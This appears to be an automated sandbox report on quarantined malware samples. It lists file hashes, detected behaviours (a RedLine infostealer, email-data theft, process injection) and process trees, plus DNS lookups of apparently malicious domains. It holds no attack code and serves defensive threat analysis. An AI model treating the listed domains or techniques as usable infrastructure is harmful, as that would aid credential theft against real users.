SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar837C.tmp

MD5 109cab5505f5e065b63d01361467a83b
SHA1 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256 ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 83142242e97b8953c386f988aa694e4a
SHA1 833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256 d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512 bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c7e306bb6c9f1e4f2e0d0d7e9510728f
SHA1 511b07b1e885ff75a3d088fc2b8751f4b9a4ac99
SHA256 18c0278df79292091f5f8368dc3a663b24ddc934cc8885d6f23379152788c6b8
SHA512 f75dd56d1f7c576d191ec7fb04a6491a4b8e24eb220fa704b6b529df32876feb540751e5483f1071d9b42bce5a469200023bf44be3a6dc91f06bf4574e27902a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1b36b97219f054288636ca1139c52bb0
SHA1 0ee7839d6a4123fcf0deda3339552fe050fcf8ad
SHA256 40c0cdccf968364f3b7d80cd5a31de191cc1c978708d33f3687193af3395a80b
SHA512 ee35054e8367876678e29e1994e1dc9552a37c8bb6bc9fee5d4786d3939254da2347ddfffbf13508fb32c4c0fc7c9beacd5e601f50849182c3a0dd811920b641

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 547cf652aaaf41ac6a4c02de63e04c90
SHA1 1dba9f35dbc1ef70d3b1b88ff55005dd8e4cdec2
SHA256 01ef238f5c7c77d0572e1ba31e537fa5e0db5840254ac77c4e41ca46b658264a
SHA512 7460cfa08081ffa1e4f034803507073ddedf4806e9501bc8ab6c522b5aa59d84a205abe1b55735b1c74084402da005e4d10e6e43485fa25c34984e70f9b16c23

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 50a46aba9a9601c101929250f1f26109
SHA1 0d44f49792e67340000bffe7b224f8cc5210c623
SHA256 dd948bdaa467ec4f8180f2dc730ca5da9e95587b401908d0623a908b4a39b0ea
SHA512 b476bc1d5b4ed73f51ffd302013f7dbaf0ec2967c0fe7f2fd1b312a44fc735f16c4b163006a8252aba25fe2bb10a358fc6018533495f753b59d69939fbe46258

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 09e8c54ee153292fe22bfb6fc9729b5a
SHA1 7a924ae6aee4326c0b67c9bd92b70f4d3c9cf7e5
SHA256 b6527c854f0afbf5a0261b67674ec4b960f2d5dd12f415286c76b0e41c856e34
SHA512 db61dd50345ba2c49b202146949b76d7fa00315d0c00c9269586da74a4ea001b5d804199fd65e277a2620f2e59725a6d95e0a6253a65cba11587406152b5075e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 64be3f8886e60f3bd9d5afd6250f46ee
SHA1 387f939d6741050917ac4691c8547e07bb09760c
SHA256 85ea286614dc34741866afba5ebcdb05e88b197ed8ef14841c3329b0c969a4b9
SHA512 5e1191d921a12ab4054c3af5c34be3017d35241d8a24cad9d09cdc7ce20c567c64e75f5f302784c69c81db371c43b4fc4bcf5e8e3569cbe28c431365d07aeda0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ced1a7ff91fdc469e435ac9cae00c049
SHA1 538ea866922149248a0e5082efa65b33bb05fc95
SHA256 08173bd43c2133862e668734f255f1f0a2bde2faeb13b6b01acd61051d3ea8aa
SHA512 44042203c9de3e10c0b1f30c7f85ed5cf8bf9ac52150e8618543016024680f3cd44938c9e97427290dad4af383c34b82393bdb08e2d1b8dda011ef5ee190d7f1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9c77253b1bc859c0100fb615ed0c8aab
SHA1 cfd1108138c35a2f1953cf206c548e27be21d6da
SHA256 dd68812d5fafb404bed83dbf80061501554138faa47adea5ecac95c51d0c86d4
SHA512 15bd3a2c67aa09c9fe92c92c0bacbe57cd517189132300d5ed8e25411dfca6917c23b0399f05e3ca6a1a4471ab66a51bfa6472d44ba909d32971b3abf78c9fd9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e739f08ae230fe6d3b00972004a7eba2
SHA1 60faa1653364ff02c5111ff324582afbe2222de9
SHA256 801f81780b91646459ca8e4bd9f9338c702b7a18a6fdb5ebcf20a3a286ff1068
SHA512 b506104a9357a1242bd66e36229577be46311ecaa78e0354812f396361fb42027ed78523a314273e4b994adc0f1a0b53207898ab9cbb713c826bca47fbb465a8

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 adc49f3c3379538709f96849eeaefee6
SHA1 92baf2c6a34d21a6b018e76795627501b1c82747
SHA256 eb3abb1f2c17a730e40c79d0990e7c2d6d0ebb3fe189ce3a1881185e5742473f
SHA512 5cb7d4a972cc433d4d1d0b9cfdb2bac7948693a511498b0c5046f27ca83d7026f1c393330af13eb184b98dac61070ec068d27ac006d68ac2ea776f0b12b5ab51

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 78825905998c050b4bd20fe3f7d8d7a4
SHA1 b39104dec570e65876f98bc8b258ea41c61c05e3
SHA256 47379278cd2327b0b4d69fec0f302a2abcc151374645e95c3fc8b7152011ddb9
SHA512 e13bbb0a4d5b757582e4e4b3019987c64177ab2d75b4acae796fbb42bc31449c4b5023f270451442a859909997816d37311fddc901dc956e3f4d890d901a2b2d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4410fbd6728006bc547f7d8430e853f2
SHA1 7022e40484f0be73094ebfa9beff527a76ab8b9a
SHA256 1a9f75a0a4b2dbbd142a4f4bd3770be2e65d9eaf521d47c594f94cca7eded120
SHA512 6db1d415bd2a4c3b74df446a0e661017e5c6f3a8120e51d2d8c93c6082435cf81b57aba6f58553215e15a12a8cefc2a56564c93f0f068ed2d78330afb04a158a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 556f61b934c6b87cb66e0ab6684304a3
SHA1 94df2760085a510859f0901d6b3cd11c5f56428f
SHA256 c33b25b4ffce4df7d8cd592d56b4e9c136b767a386b5136f094985b13fe7ddc0
SHA512 a828dc962e514a20de6f5ee235b77f0467faf42bab7cd78a0151d56ecaaafc65fd994109232315bfd8ff8efabaa9d20fa0695e1c4c4a5d1efbbef64416a06142

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 08b8ab58f3f408a64f8ea8ded48ebf8d
SHA1 ab91461602d315d00d5c3907276e1c14f45580d8
SHA256 01801fe33eecda7541d64535fcf88dd8bfca9feccdec30bffd88b25c8c9e5cd8
SHA512 2e133ffa8aaf5333b32c24772262f96f590a51f20788315fb85c632230c81710be445ecf63cdcfb704986646ee0d97c3d46a7a55685591d127ee4024caa31808

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1103cfd33d6868f18fcb50a601dc956f
SHA1 401aef94305881df5ab05362c6db5eacd70c4f1c
SHA256 28905433938cddf95ee75e57db3b69d0baa1eaa9ac996795ad9d67151870c5e9
SHA512 b096179054b63b55a7183e9e98a79d051f9b038d2dc839359d0ff65ba02d78561cdfaa8966ded8cc9cfc4697472b75975b63ad56b154f0a6299ec32064fcefcb

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9e754dc3495cce45fa350582377c9759
SHA1 434f54c7bceb8c303900abcebca7c8c9eb744d0d
SHA256 421bf2a53f6689d9e65e60e14781e548adbf0db5df7d926746ce29e6932b26c0
SHA512 8456bac1e867122e1f141880a04980fab4da373eac374dfd489ebd2b19fcc031423c6d2acc4dacbc184fc80c506d95c6c09637384f99a2a00819638f31917d61

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3599df05b72ab0caf353d0e241823c56
SHA1 95cd79ddc8e749a6d931395580e7e0024374c62f
SHA256 6d80f3d9e7255eae3d9d03a552fa156e6705ba25bfc377e2c41a1e98b04ab219
SHA512 a5f9b744f0e0d2ee3fb4e07e5e6aed6c8ba2e3152df608cd547f2413d8840d7ee4d8bd4c36e99851ef0ed44a19e6943d8f47b5ea56f77bdf2ecf9ea5ae78dd56

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 07f62e7598a135c1b2c017d88c5ff74c
SHA1 066d10d7ce1e5c7be4be7a2b1755fa40d48aeca6
SHA256 e9dfd801b94caceefddaa8d5eddcb5893abe84a38179423b426971fff0c6a81d
SHA512 a79b7dcabe4bb327b19c4e1ee92b74df9edaa67c589cb7e12cea48360d6a8040fd4d09d2ea386c49ed48e57bd0d616b026d4b7f8d66e87b03757d9d2df2d5a11

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6ba58bea72b5376879e056418be7ed38
SHA1 74373943eb26f3f6b5706013cd7c49c2ad532794
SHA256 039961a85e32484ef46d221f9e2ba431f790dcbaf4131449ff9b7ecd8692e901
SHA512 21baaf03bf6533b66ee62e2c09cfe283ef4223afba8ec1786db85dea270df73f12554e32aa60196688f2a657f1e71dadbf86c0d319081d11d0965487e65943eb

Analysis: behavioral23

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win10v2004-20250217-en

Max time kernel

106s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"

Signatures

Reads user/profile data of local email clients

spyware stealer

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3004 set thread context of 2772 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe

System Location Discovery: System Language Discovery

discovery

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3004 -ip 3004

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3004 -s 800

Network

Country Destination Domain Proto
US 8.8.8.8:53 fearleszsjourney.tech udp
US 8.8.8.8:53 uncertainyelemz.bet udp
US 8.8.8.8:53 hobbyedsmoker.live udp
US 8.8.8.8:53 dsfljsdfjewf.info udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 decreaserid.world udp
US 8.8.8.8:53 pastedeputten.life udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 disobilittyhell.live udp
US 172.67.137.158:443 disobilittyhell.live tcp
US 172.67.137.158:443 disobilittyhell.live tcp
US 172.67.137.158:443 disobilittyhell.live tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 92.123.241.137:80 www.microsoft.com tcp

Files

memory/3004-0-0x000000007519E000-0x000000007519F000-memory.dmp

memory/3004-1-0x0000000000920000-0x000000000097A000-memory.dmp

memory/3004-2-0x0000000005800000-0x0000000005DA4000-memory.dmp

memory/2772-4-0x0000000000400000-0x000000000045D000-memory.dmp

memory/2772-6-0x0000000000400000-0x000000000045D000-memory.dmp

memory/3004-7-0x0000000075190000-0x0000000075940000-memory.dmp

memory/2772-8-0x0000000000400000-0x000000000045D000-memory.dmp

memory/2772-9-0x0000000000400000-0x000000000045D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win10v2004-20250217-en

Max time kernel

140s

Max time network

138s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\0frhMAb.exe"

Signatures

RedLine

infostealer redline

Redline family

redline

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\quarantine\0frhMAb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\quarantine\0frhMAb.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\0frhMAb.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\0frhMAb.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

memory/1800-0-0x00000230A02D0000-0x00000230A03D0000-memory.dmp

memory/1800-1-0x00007FFB61B23000-0x00007FFB61B25000-memory.dmp

memory/1800-2-0x00007FFB61B20000-0x00007FFB625E1000-memory.dmp

memory/1800-3-0x00007FF605850000-0x00007FF6059FE000-memory.dmp

memory/1800-4-0x00000230A02D0000-0x00000230A03D0000-memory.dmp

memory/1800-5-0x00007FFB61B23000-0x00007FFB61B25000-memory.dmp

memory/1800-6-0x00007FFB61B20000-0x00007FFB625E1000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win7-20240903-en

Max time kernel

120s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"

Signatures

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2288 set thread context of 2788 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe

System Location Discovery: System Language Discovery

discovery

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2288 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2288 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2788 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Windows\SysWOW64\WerFault.exe
PID 2788 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Windows\SysWOW64\WerFault.exe
PID 2788 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Windows\SysWOW64\WerFault.exe
PID 2788 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Windows\SysWOW64\WerFault.exe
PID 2288 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Windows\SysWOW64\WerFault.exe
PID 2288 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Windows\SysWOW64\WerFault.exe
PID 2288 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Windows\SysWOW64\WerFault.exe
PID 2288 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 540

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2788 -s 148

Network

N/A

Files

memory/2288-0-0x000000007408E000-0x000000007408F000-memory.dmp

memory/2288-1-0x0000000000FC0000-0x000000000101A000-memory.dmp

memory/2788-13-0x0000000000400000-0x000000000045D000-memory.dmp

memory/2788-11-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2788-15-0x0000000000400000-0x000000000045D000-memory.dmp

memory/2788-9-0x0000000000400000-0x000000000045D000-memory.dmp

memory/2788-7-0x0000000000400000-0x000000000045D000-memory.dmp

memory/2788-5-0x0000000000400000-0x000000000045D000-memory.dmp

memory/2788-4-0x0000000000400000-0x000000000045D000-memory.dmp

memory/2788-3-0x0000000000400000-0x000000000045D000-memory.dmp

memory/2288-16-0x0000000074080000-0x000000007476E000-memory.dmp

memory/2288-17-0x000000007408E000-0x000000007408F000-memory.dmp

memory/2288-18-0x0000000074080000-0x000000007476E000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win10v2004-20250217-en

Max time kernel

145s

Max time network

144s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\ssystemfiktums.html

Signatures

Browser Information Discovery

discovery

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
